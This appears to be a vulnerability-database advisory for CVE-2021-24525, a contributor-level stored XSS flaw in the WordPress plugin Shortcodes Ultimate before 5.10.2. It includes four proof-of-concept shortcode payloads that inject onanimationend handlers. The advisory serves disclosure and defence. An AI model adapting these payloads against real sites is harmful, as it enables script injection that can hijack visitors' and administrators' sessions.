Lucene search
Apple502jWPEX-ID:7F5659BD-50C3-4725-95F4-CF88812ACF1CHistoryAug 23, 2021 - 12:00 a.m.
Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS
2021-08-2300:00:00
apple502j
363
0.001 Low
EPSS
Percentile
24.9%
The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don’t, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).
[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']Related
wpvulndb
wpvulndb
Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS
2021-08-23 00:00:00
openvas
openvas
WordPress Shortcodes Ultimate Plugin < 5.10.2 XSS Vulnerability
2021-10-12 00:00:00
cve
cve
CVE-2021-24525
2021-09-20 10:15:08
patchstack
patchstack
cvelist
cvelist
CVE-2021-24525 Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS
2021-09-20 10:06:15
prion
prion
Cross site scripting
2021-09-20 10:15:00
nvd
nvd
CVE-2021-24525
2021-09-20 10:15:08